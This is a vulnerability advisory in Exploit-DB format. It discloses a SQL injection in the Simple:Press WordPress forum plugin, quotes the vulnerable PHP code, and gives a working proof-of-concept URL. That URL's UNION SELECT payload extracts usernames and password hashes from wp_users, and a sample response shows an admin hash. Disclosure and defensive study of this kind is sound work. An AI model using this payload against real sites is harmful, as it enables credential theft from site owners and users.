# Title: Simple:Press WordPress Plugin SQL Injection Vulnerability# Author: ADEO Security# Published: 03/07/2010# Version: v4.3.0 (Possible all versions)# Vendor: http://simple-press.com# Download: http://simple-press.com/download-manager.php?id=228# Description: "Simple:Press – the feature rich, completely integratedand fully scaleable forum plugin for WordPress.
Highly customisable, Simple:Press packs the features of a standalone
forum into a plugin – seamlessly turning your WordPress site into a
community."
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr
# Vulnerability:
In the search field, search values not filtered and inserted into sql
queries without using any quotes/single quotes and Simple:Press
execute this sql queries.
sf-header-forum.php
---[snip]---385# Add Search Vars386if(isset($_GET['search']))387{388if($_GET['search']!='') $sfvars['searchpage']=
sf_esc_int($_GET['search']);389if(isset($_GET['value']) ? $sfvars['searchvalue']=
stripslashes(urldecode($_GET['value'])): $sfvars['searchvalue']='');390if(isset($_GET['type']) ? $sfvars['searchtype']=
sf_esc_int($_GET['type']): $sfvars['searchtype']=1);400if(isset($_GET['include']) ? $sfvars['searchinclude']=
sf_esc_int($_GET['include']): $sfvars['searchinclude']=1);401if($sfvars['searchinclude']==0) $sfvars['searchinclude']=1;402if($sfvars['searchtype']==0) $sfvars['searchtype']=1;403}else{---[snip]---
At the line 389, HTTP GET Request "value" defined asglobal variable
$sfvars['searchvalue']with filtering functions that stripslashes()and urldecode() but they can't secure it because in the
sf-database.php file the global variable $sfvar['searchvalue']
inserted into sql query without any quotes/single quotes.
sf-database.php
---[snip]---...401 $searchvalue=urldecode($sfvars['searchvalue']);...404if($sfvars['searchtype']==6)...409 $ANDWHERE =" AND topic_status_flag=".$sfvars['searchvalue']." ";410411} elseif($sfvars['searchtype']==8)...414 $userid = $sfvars['searchvalue'];415 $SELECT ="SELECT SQL_CALC_FOUND_ROWS DISTINCT ";416 $MATCH ="";417 $ANDWHERE =" AND ".SFPOSTS.".user_id=".$userid." ";418419} elseif($sfvars['searchtype']==9)...422 $userid = $sfvars['searchvalue'];...425 $ANDWHERE =" AND ".SFTOPICS.".user_id=".$userid." ";...---[snip]---
Its successfully exploitable with search types 6,8,9. Please see # PoC section.# PoC:
Request: http://server/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2
Response: Topics started by admin:$P$B9TLvhE1l2swasFRlOcABmbhZteCCo.(0 Matches Found)================================
Exploit-DB Notes:================================
Tested platform:* Ubuntu Linux version 2.6.32-22-generic (buildd@palmer)(gcc version 4.4.3(Ubuntu 4.4.3-4ubuntu5))* PHP5 + Apache2 + Mysql
* Latest version of WordPress
* Simple:Press version=v4.2.2(as of 07/05/2010 vendor still provides v4.2.2)* Settings: Magic_Quotes = off; Global variables = On
